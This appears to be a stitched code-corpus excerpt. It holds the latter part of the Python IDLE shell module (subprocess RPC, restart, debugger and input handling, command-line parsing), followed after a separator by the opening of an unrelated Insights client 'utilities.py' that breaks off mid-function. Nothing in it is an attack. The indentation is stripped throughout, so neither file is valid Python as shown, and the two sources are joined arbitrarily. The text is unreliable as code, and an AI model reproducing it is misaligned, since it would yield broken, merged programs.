if __name__ == 'idlelib.pyshell':
command = "__import__('idlelib.run').run.main(%r)" % (del_exitf,)
else:
command = "__import__('run').main(%r)" % (del_exitf,)
return [sys.executable] + w + ["-c", command, str(self.port)]
def start_subprocess(self):
addr = (HOST, self.port)
# GUI makes several attempts to acquire socket, listens for connection
for i in range(3):
time.sleep(i)
try:
self.rpcclt = MyRPCClient(addr)
break
except OSError:
pass
else:
self.display_port_binding_error()
return None
# if PORT was 0, system will assign an 'ephemeral' port. Find it out:
self.port = self.rpcclt.listening_sock.getsockname()[1]
# if PORT was not 0, probably working with a remote execution server
if PORT != 0:
# To allow reconnection within the 2MSL wait (cf. Stevens TCP
# V1, 18.6), set SO_REUSEADDR. Note that this can be problematic
# on Windows since the implementation allows two active sockets on
# the same address!
self.rpcclt.listening_sock.setsockopt(socket.SOL_SOCKET,
socket.SO_REUSEADDR, 1)
self.spawn_subprocess()
#time.sleep(20) # test to simulate GUI not accepting connection
# Accept the connection from the Python execution server
self.rpcclt.listening_sock.settimeout(10)
try:
self.rpcclt.accept()
except socket.timeout:
self.display_no_subprocess_error()
return None
self.rpcclt.register("console", self.tkconsole)
self.rpcclt.register("stdin", self.tkconsole.stdin)
self.rpcclt.register("stdout", self.tkconsole.stdout)
self.rpcclt.register("stderr", self.tkconsole.stderr)
self.rpcclt.register("flist", self.tkconsole.flist)
self.rpcclt.register("linecache", linecache)
self.rpcclt.register("interp", self)
self.transfer_path(with_cwd=True)
self.poll_subprocess()
return self.rpcclt
def restart_subprocess(self, with_cwd=False, filename=''):
if self.restarting:
return self.rpcclt
self.restarting = True
# close only the subprocess debugger
debug = self.getdebugger()
if debug:
try:
# Only close subprocess debugger, don't unregister gui_adap!
debugger_r.close_subprocess_debugger(self.rpcclt)
except:
pass
# Kill subprocess, spawn a new one, accept connection.
self.rpcclt.close()
self.terminate_subprocess()
console = self.tkconsole
was_executing = console.executing
console.executing = False
self.spawn_subprocess()
try:
self.rpcclt.accept()
except socket.timeout:
self.display_no_subprocess_error()
return None
self.transfer_path(with_cwd=with_cwd)
console.stop_readline()
# annotate restart in shell window and mark it
console.text.delete("iomark", "end-1c")
tag = 'RESTART: ' + (filename if filename else 'Shell')
halfbar = ((int(console.width) -len(tag) - 4) // 2) * '='
console.write("\n{0} {1} {0}".format(halfbar, tag))
console.text.mark_set("restart", "end-1c")
console.text.mark_gravity("restart", "left")
if not filename:
console.showprompt()
# restart subprocess debugger
if debug:
# Restarted debugger connects to current instance of debug GUI
debugger_r.restart_subprocess_debugger(self.rpcclt)
# reload remote debugger breakpoints for all PyShellEditWindows
debug.load_breakpoints()
self.compile.compiler.flags = self.original_compiler_flags
self.restarting = False
return self.rpcclt
def __request_interrupt(self):
self.rpcclt.remotecall("exec", "interrupt_the_server", (), {})
def interrupt_subprocess(self):
threading.Thread(target=self.__request_interrupt).start()
def kill_subprocess(self):
if self._afterid is not None:
self.tkconsole.text.after_cancel(self._afterid)
try:
self.rpcclt.listening_sock.close()
except AttributeError: # no socket
pass
try:
self.rpcclt.close()
except AttributeError: # no socket
pass
self.terminate_subprocess()
self.tkconsole.executing = False
self.rpcclt = None
def terminate_subprocess(self):
"Make sure subprocess is terminated"
try:
self.rpcsubproc.kill()
except OSError:
# process already terminated
return
else:
try:
self.rpcsubproc.wait()
except OSError:
return
def transfer_path(self, with_cwd=False):
if with_cwd: # Issue 13506
path = [''] # include Current Working Directory
path.extend(sys.path)
else:
path = sys.path
self.runcommand("""if 1:
import sys as _sys
_sys.path = %r
del _sys
\n""" % (path,))
active_seq = None
def poll_subprocess(self):
clt = self.rpcclt
if clt is None:
return
try:
response = clt.pollresponse(self.active_seq, wait=0.05)
except (EOFError, OSError, KeyboardInterrupt):
# lost connection or subprocess terminated itself, restart
# [the KBI is from rpc.SocketIO.handle_EOF()]
if self.tkconsole.closing:
return
response = None
self.restart_subprocess()
if response:
self.tkconsole.resetoutput()
self.active_seq = None
how, what = response
console = self.tkconsole.console
if how == "OK":
if what is not None:
print(repr(what), file=console)
elif how == "EXCEPTION":
if self.tkconsole.getvar("<<toggle-jit-stack-viewer>>"):
self.remote_stack_viewer()
elif how == "ERROR":
errmsg = "pyshell.ModifiedInterpreter: Subprocess ERROR:\n"
print(errmsg, what, file=sys.__stderr__)
print(errmsg, what, file=console)
# we received a response to the currently active seq number:
try:
self.tkconsole.endexecuting()
except AttributeError: # shell may have closed
pass
# Reschedule myself
if not self.tkconsole.closing:
self._afterid = self.tkconsole.text.after(
self.tkconsole.pollinterval, self.poll_subprocess)
debugger = None
def setdebugger(self, debugger):
self.debugger = debugger
def getdebugger(self):
return self.debugger
def open_remote_stack_viewer(self):
"""Initiate the remote stack viewer from a separate thread.
This method is called from the subprocess, and by returning from this
method we allow the subprocess to unblock. After a bit the shell
requests the subprocess to open the remote stack viewer which returns a
static object looking at the last exception. It is queried through
the RPC mechanism.
"""
self.tkconsole.text.after(300, self.remote_stack_viewer)
return
def remote_stack_viewer(self):
from idlelib import debugobj_r
oid = self.rpcclt.remotequeue("exec", "stackviewer", ("flist",), {})
if oid is None:
self.tkconsole.root.bell()
return
item = debugobj_r.StubObjectTreeItem(self.rpcclt, oid)
from idlelib.tree import ScrolledCanvas, TreeNode
top = Toplevel(self.tkconsole.root)
theme = idleConf.CurrentTheme()
background = idleConf.GetHighlight(theme, 'normal')['background']
sc = ScrolledCanvas(top, bg=background, highlightthickness=0)
sc.frame.pack(expand=1, fill="both")
node = TreeNode(sc.canvas, None, item)
node.expand()
# XXX Should GC the remote tree when closing the window
gid = 0
def execsource(self, source):
"Like runsource() but assumes complete exec source"
filename = self.stuffsource(source)
self.execfile(filename, source)
def execfile(self, filename, source=None):
"Execute an existing file"
if source is None:
with tokenize.open(filename) as fp:
source = fp.read()
try:
code = compile(source, filename, "exec")
except (OverflowError, SyntaxError):
self.tkconsole.resetoutput()
print('*** Error in script or command!\n'
'Traceback (most recent call last):',
file=self.tkconsole.stderr)
InteractiveInterpreter.showsyntaxerror(self, filename)
self.tkconsole.showprompt()
else:
self.runcode(code)
def runsource(self, source):
"Extend base class method: Stuff the source in the line cache first"
filename = self.stuffsource(source)
self.more = 0
self.save_warnings_filters = warnings.filters[:]
warnings.filterwarnings(action="error", category=SyntaxWarning)
# at the moment, InteractiveInterpreter expects str
assert isinstance(source, str)
#if isinstance(source, str):
# from idlelib import iomenu
# try:
# source = source.encode(iomenu.encoding)
# except UnicodeError:
# self.tkconsole.resetoutput()
# self.write("Unsupported characters in input\n")
# return
try:
# InteractiveInterpreter.runsource() calls its runcode() method,
# which is overridden (see below)
return InteractiveInterpreter.runsource(self, source, filename)
finally:
if self.save_warnings_filters is not None:
warnings.filters[:] = self.save_warnings_filters
self.save_warnings_filters = None
def stuffsource(self, source):
"Stuff source in the filename cache"
filename = "<pyshell#%d>" % self.gid
self.gid = self.gid + 1
lines = source.split("\n")
linecache.cache[filename] = len(source)+1, 0, lines, filename
return filename
def prepend_syspath(self, filename):
"Prepend sys.path with file's directory if not already included"
self.runcommand("""if 1:
_filename = %r
import sys as _sys
from os.path import dirname as _dirname
_dir = _dirname(_filename)
if not _dir in _sys.path:
_sys.path.insert(0, _dir)
del _filename, _sys, _dirname, _dir
\n""" % (filename,))
def showsyntaxerror(self, filename=None):
"""Override Interactive Interpreter method: Use Colorizing
Color the offending position instead of printing it and pointing at it
with a caret.
"""
tkconsole = self.tkconsole
text = tkconsole.text
text.tag_remove("ERROR", "1.0", "end")
type, value, tb = sys.exc_info()
msg = getattr(value, 'msg', '') or value or "<no detail available>"
lineno = getattr(value, 'lineno', '') or 1
offset = getattr(value, 'offset', '') or 0
if offset == 0:
lineno += 1 #mark end of offending line
if lineno == 1:
pos = "iomark + %d chars" % (offset-1)
else:
pos = "iomark linestart + %d lines + %d chars" % \
(lineno-1, offset-1)
tkconsole.colorize_syntax_error(text, pos)
tkconsole.resetoutput()
self.write("SyntaxError: %s\n" % msg)
tkconsole.showprompt()
def showtraceback(self):
"Extend base class method to reset output properly"
self.tkconsole.resetoutput()
self.checklinecache()
InteractiveInterpreter.showtraceback(self)
if self.tkconsole.getvar("<<toggle-jit-stack-viewer>>"):
self.tkconsole.open_stack_viewer()
def checklinecache(self):
c = linecache.cache
for key in list(c.keys()):
if key[:1] + key[-1:] != "<>":
del c[key]
def runcommand(self, code):
"Run the code without invoking the debugger"
# The code better not raise an exception!
if self.tkconsole.executing:
self.display_executing_dialog()
return 0
if self.rpcclt:
self.rpcclt.remotequeue("exec", "runcode", (code,), {})
else:
exec(code, self.locals)
return 1
def runcode(self, code):
"Override base class method"
if self.tkconsole.executing:
self.interp.restart_subprocess()
self.checklinecache()
if self.save_warnings_filters is not None:
warnings.filters[:] = self.save_warnings_filters
self.save_warnings_filters = None
debugger = self.debugger
try:
self.tkconsole.beginexecuting()
if not debugger and self.rpcclt is not None:
self.active_seq = self.rpcclt.asyncqueue("exec", "runcode",
(code,), {})
elif debugger:
debugger.run(code, self.locals)
else:
exec(code, self.locals)
except SystemExit:
if not self.tkconsole.closing:
if tkMessageBox.askyesno(
"Exit?",
"Do you want to exit altogether?",
default="yes",
parent=self.tkconsole.text):
raise
else:
self.showtraceback()
else:
raise
except:
if use_subprocess:
print("IDLE internal error in runcode()",
file=self.tkconsole.stderr)
self.showtraceback()
self.tkconsole.endexecuting()
else:
if self.tkconsole.canceled:
self.tkconsole.canceled = False
print("KeyboardInterrupt", file=self.tkconsole.stderr)
else:
self.showtraceback()
finally:
if not use_subprocess:
try:
self.tkconsole.endexecuting()
except AttributeError: # shell may have closed
pass
def write(self, s):
"Override base class method"
return self.tkconsole.stderr.write(s)
def display_port_binding_error(self):
tkMessageBox.showerror(
"Port Binding Error",
"IDLE can't bind to a TCP/IP port, which is necessary to "
"communicate with its Python execution server. This might be "
"because no networking is installed on this computer. "
"Run IDLE with the -n command line switch to start without a "
"subprocess and refer to Help/IDLE Help 'Running without a "
"subprocess' for further details.",
parent=self.tkconsole.text)
def display_no_subprocess_error(self):
tkMessageBox.showerror(
"Subprocess Startup Error",
"IDLE's subprocess didn't make connection. Either IDLE can't "
"start a subprocess or personal firewall software is blocking "
"the connection.",
parent=self.tkconsole.text)
def display_executing_dialog(self):
tkMessageBox.showerror(
"Already executing",
"The Python Shell window is already executing a command; "
"please wait until it is finished.",
parent=self.tkconsole.text)
class PyShell(OutputWindow):
shell_title = "Python " + python_version() + " Shell"
# Override classes
ColorDelegator = ModifiedColorDelegator
UndoDelegator = ModifiedUndoDelegator
# Override menus
menu_specs = [
("file", "_File"),
("edit", "_Edit"),
("debug", "_Debug"),
("options", "_Options"),
("windows", "_Window"),
("help", "_Help"),
]
# New classes
from idlelib.history import History
def __init__(self, flist=None):
if use_subprocess:
ms = self.menu_specs
if ms[2][0] != "shell":
ms.insert(2, ("shell", "She_ll"))
self.interp = ModifiedInterpreter(self)
if flist is None:
root = Tk()
fixwordbreaks(root)
root.withdraw()
flist = PyShellFileList(root)
#
OutputWindow.__init__(self, flist, None, None)
#
## self.config(usetabs=1, indentwidth=8, context_use_ps1=1)
self.usetabs = True
# indentwidth must be 8 when using tabs. See note in EditorWindow:
self.indentwidth = 8
self.context_use_ps1 = True
#
text = self.text
text.configure(wrap="char")
text.bind("<<newline-and-indent>>", self.enter_callback)
text.bind("<<plain-newline-and-indent>>", self.linefeed_callback)
text.bind("<<interrupt-execution>>", self.cancel_callback)
text.bind("<<end-of-file>>", self.eof_callback)
text.bind("<<open-stack-viewer>>", self.open_stack_viewer)
text.bind("<<toggle-debugger>>", self.toggle_debugger)
text.bind("<<toggle-jit-stack-viewer>>", self.toggle_jit_stack_viewer)
if use_subprocess:
text.bind("<<view-restart>>", self.view_restart_mark)
text.bind("<<restart-shell>>", self.restart_shell)
#
self.save_stdout = sys.stdout
self.save_stderr = sys.stderr
self.save_stdin = sys.stdin
from idlelib import iomenu
self.stdin = PseudoInputFile(self, "stdin", iomenu.encoding)
self.stdout = PseudoOutputFile(self, "stdout", iomenu.encoding)
self.stderr = PseudoOutputFile(self, "stderr", iomenu.encoding)
self.console = PseudoOutputFile(self, "console", iomenu.encoding)
if not use_subprocess:
sys.stdout = self.stdout
sys.stderr = self.stderr
sys.stdin = self.stdin
try:
# page help() text to shell.
import pydoc # import must be done here to capture i/o rebinding.
# XXX KBK 27Dec07 use TextViewer someday, but must work w/o subproc
pydoc.pager = pydoc.plainpager
except:
sys.stderr = sys.__stderr__
raise
#
self.history = self.History(self.text)
#
self.pollinterval = 50 # millisec
def get_standard_extension_names(self):
return idleConf.GetExtensions(shell_only=True)
reading = False
executing = False
canceled = False
endoffile = False
closing = False
_stop_readline_flag = False
def set_warning_stream(self, stream):
global warning_stream
warning_stream = stream
def get_warning_stream(self):
return warning_stream
def toggle_debugger(self, event=None):
if self.executing:
tkMessageBox.showerror("Don't debug now",
"You can only toggle the debugger when idle",
parent=self.text)
self.set_debugger_indicator()
return "break"
else:
db = self.interp.getdebugger()
if db:
self.close_debugger()
else:
self.open_debugger()
def set_debugger_indicator(self):
db = self.interp.getdebugger()
self.setvar("<<toggle-debugger>>", not not db)
def toggle_jit_stack_viewer(self, event=None):
pass # All we need is the variable
def close_debugger(self):
db = self.interp.getdebugger()
if db:
self.interp.setdebugger(None)
db.close()
if self.interp.rpcclt:
debugger_r.close_remote_debugger(self.interp.rpcclt)
self.resetoutput()
self.console.write("[DEBUG OFF]\n")
sys.ps1 = ">>> "
self.showprompt()
self.set_debugger_indicator()
def open_debugger(self):
if self.interp.rpcclt:
dbg_gui = debugger_r.start_remote_debugger(self.interp.rpcclt,
self)
else:
dbg_gui = debugger.Debugger(self)
self.interp.setdebugger(dbg_gui)
dbg_gui.load_breakpoints()
sys.ps1 = "[DEBUG ON]\n>>> "
self.showprompt()
self.set_debugger_indicator()
def beginexecuting(self):
"Helper for ModifiedInterpreter"
self.resetoutput()
self.executing = 1
def endexecuting(self):
"Helper for ModifiedInterpreter"
self.executing = 0
self.canceled = 0
self.showprompt()
def close(self):
"Extend EditorWindow.close()"
if self.executing:
response = tkMessageBox.askokcancel(
"Kill?",
"Your program is still running!\n Do you want to kill it?",
default="ok",
parent=self.text)
if response is False:
return "cancel"
self.stop_readline()
self.canceled = True
self.closing = True
return EditorWindow.close(self)
def _close(self):
"Extend EditorWindow._close(), shut down debugger and execution server"
self.close_debugger()
if use_subprocess:
self.interp.kill_subprocess()
# Restore std streams
sys.stdout = self.save_stdout
sys.stderr = self.save_stderr
sys.stdin = self.save_stdin
# Break cycles
self.interp = None
self.console = None
self.flist.pyshell = None
self.history = None
EditorWindow._close(self)
def ispythonsource(self, filename):
"Override EditorWindow method: never remove the colorizer"
return True
def short_title(self):
return self.shell_title
COPYRIGHT = \
'Type "copyright", "credits" or "license()" for more information.'
def begin(self):
self.text.mark_set("iomark", "insert")
self.resetoutput()
if use_subprocess:
nosub = ''
client = self.interp.start_subprocess()
if not client:
self.close()
return False
else:
nosub = ("==== No Subprocess ====\n\n" +
"WARNING: Running IDLE without a Subprocess is deprecated\n" +
"and will be removed in a later version. See Help/IDLE Help\n" +
"for details.\n\n")
sys.displayhook = rpc.displayhook
self.write("Python %s on %s\n%s\n%s" %
(sys.version, sys.platform, self.COPYRIGHT, nosub))
self.text.focus_force()
self.showprompt()
import tkinter
tkinter._default_root = None # 03Jan04 KBK What's this?
return True
def stop_readline(self):
if not self.reading: # no nested mainloop to exit.
return
self._stop_readline_flag = True
self.top.quit()
def readline(self):
save = self.reading
try:
self.reading = 1
self.top.mainloop() # nested mainloop()
finally:
self.reading = save
if self._stop_readline_flag:
self._stop_readline_flag = False
return ""
line = self.text.get("iomark", "end-1c")
if len(line) == 0: # may be EOF if we quit our mainloop with Ctrl-C
line = "\n"
self.resetoutput()
if self.canceled:
self.canceled = 0
if not use_subprocess:
raise KeyboardInterrupt
if self.endoffile:
self.endoffile = 0
line = ""
return line
def isatty(self):
return True
def cancel_callback(self, event=None):
try:
if self.text.compare("sel.first", "!=", "sel.last"):
return # Active selection -- always use default binding
except:
pass
if not (self.executing or self.reading):
self.resetoutput()
self.interp.write("KeyboardInterrupt\n")
self.showprompt()
return "break"
self.endoffile = 0
self.canceled = 1
if (self.executing and self.interp.rpcclt):
if self.interp.getdebugger():
self.interp.restart_subprocess()
else:
self.interp.interrupt_subprocess()
if self.reading:
self.top.quit() # exit the nested mainloop() in readline()
return "break"
def eof_callback(self, event):
if self.executing and not self.reading:
return # Let the default binding (delete next char) take over
if not (self.text.compare("iomark", "==", "insert") and
self.text.compare("insert", "==", "end-1c")):
return # Let the default binding (delete next char) take over
if not self.executing:
self.resetoutput()
self.close()
else:
self.canceled = 0
self.endoffile = 1
self.top.quit()
return "break"
def linefeed_callback(self, event):
# Insert a linefeed without entering anything (still autoindented)
if self.reading:
self.text.insert("insert", "\n")
self.text.see("insert")
else:
self.newline_and_indent_event(event)
return "break"
def enter_callback(self, event):
if self.executing and not self.reading:
return # Let the default binding (insert '\n') take over
# If some text is selected, recall the selection
# (but only if this before the I/O mark)
try:
sel = self.text.get("sel.first", "sel.last")
if sel:
if self.text.compare("sel.last", "<=", "iomark"):
self.recall(sel, event)
return "break"
except:
pass
# If we're strictly before the line containing iomark, recall
# the current line, less a leading prompt, less leading or
# trailing whitespace
if self.text.compare("insert", "<", "iomark linestart"):
# Check if there's a relevant stdin range -- if so, use it
prev = self.text.tag_prevrange("stdin", "insert")
if prev and self.text.compare("insert", "<", prev[1]):
self.recall(self.text.get(prev[0], prev[1]), event)
return "break"
next = self.text.tag_nextrange("stdin", "insert")
if next and self.text.compare("insert lineend", ">=", next[0]):
self.recall(self.text.get(next[0], next[1]), event)
return "break"
# No stdin mark -- just get the current line, less any prompt
indices = self.text.tag_nextrange("console", "insert linestart")
if indices and \
self.text.compare(indices[0], "<=", "insert linestart"):
self.recall(self.text.get(indices[1], "insert lineend"), event)
else:
self.recall(self.text.get("insert linestart", "insert lineend"), event)
return "break"
# If we're between the beginning of the line and the iomark, i.e.
# in the prompt area, move to the end of the prompt
if self.text.compare("insert", "<", "iomark"):
self.text.mark_set("insert", "iomark")
# If we're in the current input and there's only whitespace
# beyond the cursor, erase that whitespace first
s = self.text.get("insert", "end-1c")
if s and not s.strip():
self.text.delete("insert", "end-1c")
# If we're in the current input before its last line,
# insert a newline right at the insert point
if self.text.compare("insert", "<", "end-1c linestart"):
self.newline_and_indent_event(event)
return "break"
# We're in the last line; append a newline and submit it
self.text.mark_set("insert", "end-1c")
if self.reading:
self.text.insert("insert", "\n")
self.text.see("insert")
else:
self.newline_and_indent_event(event)
self.text.tag_add("stdin", "iomark", "end-1c")
self.text.update_idletasks()
if self.reading:
self.top.quit() # Break out of recursive mainloop()
else:
self.runit()
return "break"
def recall(self, s, event):
# remove leading and trailing empty or whitespace lines
s = re.sub(r'^\s*\n', '' , s)
s = re.sub(r'\n\s*$', '', s)
lines = s.split('\n')
self.text.undo_block_start()
try:
self.text.tag_remove("sel", "1.0", "end")
self.text.mark_set("insert", "end-1c")
prefix = self.text.get("insert linestart", "insert")
if prefix.rstrip().endswith(':'):
self.newline_and_indent_event(event)
prefix = self.text.get("insert linestart", "insert")
self.text.insert("insert", lines[0].strip())
if len(lines) > 1:
orig_base_indent = re.search(r'^([ \t]*)', lines[0]).group(0)
new_base_indent = re.search(r'^([ \t]*)', prefix).group(0)
for line in lines[1:]:
if line.startswith(orig_base_indent):
# replace orig base indentation with new indentation
line = new_base_indent + line[len(orig_base_indent):]
self.text.insert('insert', '\n'+line.rstrip())
finally:
self.text.see("insert")
self.text.undo_block_stop()
def runit(self):
line = self.text.get("iomark", "end-1c")
# Strip off last newline and surrounding whitespace.
# (To allow you to hit return twice to end a statement.)
i = len(line)
while i > 0 and line[i-1] in " \t":
i = i-1
if i > 0 and line[i-1] == "\n":
i = i-1
while i > 0 and line[i-1] in " \t":
i = i-1
line = line[:i]
self.interp.runsource(line)
def open_stack_viewer(self, event=None):
if self.interp.rpcclt:
return self.interp.remote_stack_viewer()
try:
sys.last_traceback
except:
tkMessageBox.showerror("No stack trace",
"There is no stack trace yet.\n"
"(sys.last_traceback is not defined)",
parent=self.text)
return
from idlelib.stackviewer import StackBrowser
StackBrowser(self.root, self.flist)
def view_restart_mark(self, event=None):
self.text.see("iomark")
self.text.see("restart")
def restart_shell(self, event=None):
"Callback for Run/Restart Shell Cntl-F6"
self.interp.restart_subprocess(with_cwd=True)
def showprompt(self):
self.resetoutput()
try:
s = str(sys.ps1)
except:
s = ""
self.console.write(s)
self.text.mark_set("insert", "end-1c")
self.set_line_and_column()
self.io.reset_undo()
def resetoutput(self):
source = self.text.get("iomark", "end-1c")
if self.history:
self.history.store(source)
if self.text.get("end-2c") != "\n":
self.text.insert("end-1c", "\n")
self.text.mark_set("iomark", "end-1c")
self.set_line_and_column()
def write(self, s, tags=()):
if isinstance(s, str) and len(s) and max(s) > '\uffff':
# Tk doesn't support outputting non-BMP characters
# Let's assume what printed string is not very long,
# find first non-BMP character and construct informative
# UnicodeEncodeError exception.
for start, char in enumerate(s):
if char > '\uffff':
break
raise UnicodeEncodeError("UCS-2", char, start, start+1,
'Non-BMP character not supported in Tk')
try:
self.text.mark_gravity("iomark", "right")
count = OutputWindow.write(self, s, tags, "iomark")
self.text.mark_gravity("iomark", "left")
except:
raise ###pass # ### 11Aug07 KBK if we are expecting exceptions
# let's find out what they are and be specific.
if self.canceled:
self.canceled = 0
if not use_subprocess:
raise KeyboardInterrupt
return count
def rmenu_check_cut(self):
try:
if self.text.compare('sel.first', '<', 'iomark'):
return 'disabled'
except TclError: # no selection, so the index 'sel.first' doesn't exist
return 'disabled'
return super().rmenu_check_cut()
def rmenu_check_paste(self):
if self.text.compare('insert','<','iomark'):
return 'disabled'
return super().rmenu_check_paste()
def fix_x11_paste(root):
"Make paste replace selection on x11. See issue #5124."
if root._windowingsystem == 'x11':
for cls in 'Text', 'Entry', 'Spinbox':
root.bind_class(
cls,
'<<Paste>>',
'catch {%W delete sel.first sel.last}\n' +
root.bind_class(cls, '<<Paste>>'))
usage_msg = """\
USAGE: idle [-deins] [-t title] [file]*
idle [-dns] [-t title] (-c cmd | -r file) [arg]*
idle [-dns] [-t title] - [arg]*
-h print this help message and exit
-n run IDLE without a subprocess (DEPRECATED,
see Help/IDLE Help for details)
The following options will override the IDLE 'settings' configuration:
-e open an edit window
-i open a shell window
The following options imply -i and will open a shell:
-c cmd run the command in a shell, or
-r file run script from file
-d enable the debugger
-s run $IDLESTARTUP or $PYTHONSTARTUP before anything else
-t title set title of shell window
A default edit window will be bypassed when -c, -r, or - are used.
[arg]* are passed to the command (-c) or script (-r) in sys.argv[1:].
Examples:
idle
Open an edit window or shell depending on IDLE's configuration.
idle foo.py foobar.py
Edit the files, also open a shell if configured to start with shell.
idle -est "Baz" foo.py
Run $IDLESTARTUP or $PYTHONSTARTUP, edit foo.py, and open a shell
window with the title "Baz".
idle -c "import sys; print(sys.argv)" "foo"
Open a shell window and run the command, passing "-c" in sys.argv[0]
and "foo" in sys.argv[1].
idle -d -s -r foo.py "Hello World"
Open a shell window, run a startup script, enable the debugger, and
run foo.py, passing "foo.py" in sys.argv[0] and "Hello World" in
sys.argv[1].
echo "import sys; print(sys.argv)" | idle - "foobar"
Open a shell window, run the script piped in, passing '' in sys.argv[0]
and "foobar" in sys.argv[1].
"""
def main():
import getopt
from platform import system
from idlelib import testing # bool value
from idlelib import macosx
global flist, root, use_subprocess
capture_warnings(True)
use_subprocess = True
enable_shell = False
enable_edit = False
debug = False
cmd = None
script = None
startup = False
try:
opts, args = getopt.getopt(sys.argv[1:], "c:deihnr:st:")
except getopt.error as msg:
print("Error: %s\n%s" % (msg, usage_msg), file=sys.stderr)
sys.exit(2)
for o, a in opts:
if o == '-c':
cmd = a
enable_shell = True
if o == '-d':
debug = True
enable_shell = True
if o == '-e':
enable_edit = True
if o == '-h':
sys.stdout.write(usage_msg)
sys.exit()
if o == '-i':
enable_shell = True
if o == '-n':
print(" Warning: running IDLE without a subprocess is deprecated.",
file=sys.stderr)
use_subprocess = False
if o == '-r':
script = a
if os.path.isfile(script):
pass
else:
print("No script file: ", script)
sys.exit()
enable_shell = True
if o == '-s':
startup = True
enable_shell = True
if o == '-t':
PyShell.shell_title = a
enable_shell = True
if args and args[0] == '-':
cmd = sys.stdin.read()
enable_shell = True
# process sys.argv and sys.path:
for i in range(len(sys.path)):
sys.path[i] = os.path.abspath(sys.path[i])
if args and args[0] == '-':
sys.argv = [''] + args[1:]
elif cmd:
sys.argv = ['-c'] + args
elif script:
sys.argv = [script] + args
elif args:
enable_edit = True
pathx = []
for filename in args:
pathx.append(os.path.dirname(filename))
for dir in pathx:
dir = os.path.abspath(dir)
if not dir in sys.path:
sys.path.insert(0, dir)
else:
dir = os.getcwd()
if dir not in sys.path:
sys.path.insert(0, dir)
# check the IDLE settings configuration (but command line overrides)
edit_start = idleConf.GetOption('main', 'General',
'editor-on-startup', type='bool')
enable_edit = enable_edit or edit_start
enable_shell = enable_shell or not enable_edit
# Setup root. Don't break user code run in IDLE process.
# Don't change environment when testing.
if use_subprocess and not testing:
NoDefaultRoot()
root = Tk(className="Idle")
root.withdraw()
# set application icon
icondir = os.path.join(os.path.dirname(__file__), 'Icons')
if system() == 'Windows':
iconfile = os.path.join(icondir, 'idle.ico')
root.wm_iconbitmap(default=iconfile)
else:
ext = '.png' if TkVersion >= 8.6 else '.gif'
iconfiles = [os.path.join(icondir, 'idle_%d%s' % (size, ext))
for size in (16, 32, 48)]
icons = [PhotoImage(master=root, file=iconfile)
for iconfile in iconfiles]
root.wm_iconphoto(True, *icons)
# start editor and/or shell windows:
fixwordbreaks(root)
fix_x11_paste(root)
flist = PyShellFileList(root)
macosx.setupApp(root, flist)
if enable_edit:
if not (cmd or script):
for filename in args[:]:
if flist.open(filename) is None:
# filename is a directory actually, disconsider it
args.remove(filename)
if not args:
flist.new()
if enable_shell:
shell = flist.open_shell()
if not shell:
return # couldn't open shell
if macosx.isAquaTk() and flist.dict:
# On OSX: when the user has double-clicked on a file that causes
# IDLE to be launched the shell window will open just in front of
# the file she wants to see. Lower the interpreter window when
# there are open files.
shell.top.lower()
else:
shell = flist.pyshell
# Handle remaining options. If any of these are set, enable_shell
# was set also, so shell must be true to reach here.
if debug:
shell.open_debugger()
if startup:
filename = os.environ.get("IDLESTARTUP") or \
os.environ.get("PYTHONSTARTUP")
if filename and os.path.isfile(filename):
shell.interp.execfile(filename)
if cmd or script:
shell.interp.runcommand("""if 1:
import sys as _sys
_sys.argv = %r
del _sys
\n""" % (sys.argv,))
if cmd:
shell.interp.execsource(cmd)
elif script:
shell.interp.prepend_syspath(script)
shell.interp.execfile(script)
elif shell:
# If there is a shell window and no cmd or script in progress,
# check for problematic OS X Tk versions and print a warning
# message in the IDLE shell window; this is less intrusive
# than always opening a separate window.
tkversionwarning = macosx.tkVersionWarning(root)
if tkversionwarning:
shell.interp.runcommand("print('%s')" % tkversionwarning)
while flist.inversedict: # keep IDLE running while files are open.
root.mainloop()
root.destroy()
capture_warnings(False)
if __name__ == "__main__":
sys.modules['pyshell'] = sys.modules['__main__']
main()
capture_warnings(False) # Make sure turned off; see issue 18081
|
utilities.py | """
Utility functions
"""
from __future__ import absolute_import
import glob
import socket
import os
import logging
import uuid
import datetime
import shlex
import re
import sys
import threading
import time
import json
import tarfile
from subprocess import Popen, PIPE, STDOUT
import yaml
try:
from yaml import CDumper as Dumper
except ImportError:
from yaml import Dumper
from .. import package_info
from .constants import InsightsConstants as constants
from .collection_rules import InsightsUploadConf, load_yaml
from insights.core.context import Context
from insights.parsers.os_release import OsRelease
from insights.parsers.redhat_release import RedhatRelease
try:
from insights_client.constants import InsightsConstants as wrapper_constants
except ImportError:
wrapper_constants = None
logger = logging.getLogger(__name__)
def determine_hostname(display_name=None):
"""
Find fqdn if we can
"""
if display_name:
# if display_name is provided, just return the given name
return display_name
else:
socket_gethostname = socket.gethostname()
socket_fqdn = socket.getfqdn()
try:
socket_ex = socket.gethostbyname_ex(socket_gethostname)[0]
except (LookupError, socket.gaierror):
socket_ex = ''
gethostname_len = len(socket_gethostname)
fqdn_len = len(socket_fqdn)
ex_len = len(socket_ex)
if fqdn_len > gethostname_len or ex_len > gethostname_len:
if "localhost" not in socket_ex and len(socket_ex):
return socket_ex
if "localhost" not in socket_fqdn:
return socket_fqdn
return socket_gethostname
def get_time():
return datetime.datetime.isoformat(datetime.datetime.now())
def write_registered_file():
delete_unregistered_file()
for f in constants.registered_files:
if os.path.lexists(f):
if os.path.islink(f):
# kill symlinks and regenerate
os.remove(f)
write_to_disk(f)
else:
write_to_disk(f)
def write_unregistered_file(date=None):
"""
Write .unregistered out to disk
"""
delete_registered_file()
if date is None:
date = get_time()
for f in constants.unregistered_files:
if os.path.lexists(f):
if os.path.islink(f):
# kill symlinks and regenerate
os.remove(f)
write_to_disk(f, content=str(date))
else:
write_to_disk(f, content=str(date))
def delete_registered_file():
for f in constants.registered_files:
write_to_disk(f, delete=True)
def delete_unregistered_file():
for f in constants.unregistered_files:
write_to_disk(f, delete=True)
def delete_cache_files():
for f in glob.glob(os.path.join(constants.insights_core_lib_dir, "*.json")):
os.remove(f)
def write_to_disk(filename, delete=False, content=get_time()):
"""
Write filename out to disk
"""
if not os.path.exists(os.path.dirname(filename)):
return
if delete:
if os.path.lexists(filename):
os.remove(filename)
else:
with open(filename, 'wb') as f:
f.write(content.encode('utf-8'))
def generate_machine_id(new=False,
destination_file=constants.machine_id_file):
"""
Generate a machine-id if /etc/insights-client/machine-id does not exist
"""
machine_id = None
machine_id_file = None
logging_name = 'machine-id'
if os.path.isfile(destination_file) and not new:
logger.debug('Found %s', destination_file)
with open(destination_file, 'r') as machine_id_file:
machine_id = machine_id_file.read()
else:
